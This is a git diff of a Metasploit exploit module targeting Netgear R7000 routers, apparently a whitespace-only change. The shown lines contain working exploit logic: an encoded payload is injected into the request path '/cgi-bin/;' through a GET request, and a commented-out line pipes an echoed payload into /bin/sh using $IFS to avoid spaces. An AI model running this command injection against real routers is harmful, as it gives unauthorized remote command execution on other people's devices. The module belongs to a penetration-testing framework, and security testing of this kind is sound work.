diff --git a/modules/exploits/linux/http/netgear_r7000_cgibin_exec.rb b/modules/exploits/linux/http/netgear_r7000_cgibin_exec.rb
index e9e4f3e55e..7d92a857de 100644
--- a/modules/exploits/linux/http/netgear_r7000_cgibin_exec.rb
+++ b/modules/exploits/linux/http/netgear_r7000_cgibin_exec.rb
@@ -39,7 +39,7 @@ class MetasploitModule < Msf::Exploit::Remote
 {
 'Space' => 1024,
 'DisableNops' => true,
- 'BadChars' => "\x20"
+ 'BadChars' => "\x20"
 }
 ))
@@ -80,20 +80,20 @@ class MetasploitModule < Msf::Exploit::Remote
 def exploit
 check
-
+
 pe = payload.encoded
 pe.to_s
 pe.gsub!('{','')
- pe.gsub!('}','')
-
+ pe.gsub!('}','')
+
 #cmd = payload.encoded.unpack("C*").map{|c| "\\x%.2x" % c}.join
 #str = "echo$IFS-ne$IFS\"#{cmd}\"|/bin/sh&"
 print_status('Sending encoded command...')
 vprint_status("Encoded command: #{pe}")
- send_request_cgi({
- 'uri' => "/cgi-bin/;#{pe}",
- 'method' => 'GET'
+ send_request_cgi({
+ 'uri' => "/cgi-bin/;#{pe}",
+ 'method' => 'GET'
 })
 print_status('Giving the handler time to run...')